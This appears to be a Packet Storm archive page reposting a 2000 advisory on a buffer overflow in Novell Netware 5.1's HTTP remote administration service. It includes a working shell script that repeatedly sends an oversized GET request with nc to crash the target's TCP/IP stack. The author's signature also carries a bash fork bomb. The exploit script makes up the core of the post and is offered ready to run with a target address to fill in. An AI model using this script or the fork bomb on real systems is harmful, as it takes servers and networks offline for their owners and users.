what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

kill_nwtcp.c

kill_nwtcp.c
Posted Apr 23, 2000
Authored by Michal Zalewski | Site lcamtuf.na.export.pl

Novell Netware 5.1 Remote Administration Service contains a buffer overflow that could allow an attacker to launch a denial of service attack against the system, or possibly inject code into the operating system for execution. DoS exploit included.

tags | exploit, remote, denial of service, overflow
SHA-256 | daeeaaf07bbd7be2d103ab1cd49ffde2eb56484860d53f34ddeeccce4add2867

kill_nwtcp.c

Change Mirror Download

Hi again. Another overflow and TCP/IP stack flaw.

Affected: virtually any system running on the top of Netware system with
http remote administration (including web caching solutions,
BorderManager firewall and so on)...

There's an buffer overflow in remote (http, usually on port 8008 or so)
administration protocol for tcp-enabled Netware servers - it might be
exploited by sending request like that:

GET /
AAAAAAAAAAAAAAAAAAAAAAAAAAA.......(something between 4 and 8kb)

Connection won't be dropped (that's Netware TCP/IP stack problem or
_feature_), but you'll get an error message on console, sometimes with
stack dump (yes, lovely: 41 41 41 41... ;) There are two problems with it:

1. Of course, overflow, allowing attacker to execute arbitraty code on
server,

2. Problem with TCP/IP stack; there's no automatic clean-up in case of
application crash. By connecting, sending evil request, disconnecting
and connecting again for some time (usually few thousand times is
enough), whole TCP/IP stack will be fscked up, causing death of
TCP networking (first, server starts to refuse or immediately drops
any connection, then stops responding network requests), and,
eventually, whole server dies.

There's simple script, which, left for some time, should kill Netware
TCP/IP. Please change $SERVER and $PORT for testing purposes.

-- kill_nwtcp.c --
#!/bin/sh

SERVER=127.0.0.1
PORT=8008
WAIT=3

DUZOA=`perl -e '{print "A"x4093}'`
MAX=30

while :; do
ILE=0
while [ $ILE -lt $MAX ]; do
(
(
echo "GET /"
echo $DUZOA
echo
) | nc $SERVER $PORT &
sleep $WAIT
kill -9 $!
) &>/dev/null &
ILE=$[ILE+1]
done
sleep $WAIT
done

-- EOF --

For me, Novell sells pretty good IPX solutions for local networks, but it
isn't the best idea to use it as firewall, as system architecture based on
DOS isn't good for Real Networking :(

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close